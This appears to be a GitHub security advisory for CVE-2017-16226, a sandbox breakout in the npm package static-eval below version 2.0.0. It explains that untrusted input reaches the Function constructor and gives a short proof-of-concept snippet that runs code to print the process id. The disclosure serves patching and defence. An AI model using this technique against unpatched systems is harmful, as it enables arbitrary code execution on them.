Skip to content

Sandbox Breakout / Arbitrary Code Execution in static-eval

Moderate severity GitHub Reviewed Published Aug 6, 2018 to the GitHub Advisory Database • Updated Sep 11, 2023

Package

npm static-eval (npm)

Affected versions

< 2.0.0

Patched versions

2.0.0

Description

Affected versions of static-eval pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.

Proof of concept

var evaluate = require('static-eval');
var parse = require('esprima').parse;
var src = '(function(){console.log(process.pid)})()';
var ast = parse(src).body[0].expression;
var res = evaluate(ast, {});
// Will print the process id

Recommendation

Update to version 2.0.0 or later.

References

Published to the GitHub Advisory Database Aug 6, 2018
Reviewed Jun 16, 2020
Last updated Sep 11, 2023

Severity

Moderate

Weaknesses

CVE ID

CVE-2017-16226

GHSA ID

GHSA-5mjw-6jrh-hvfq

Source code

No known source code
Checking history
See something to contribute? Suggest improvements for this vulnerability.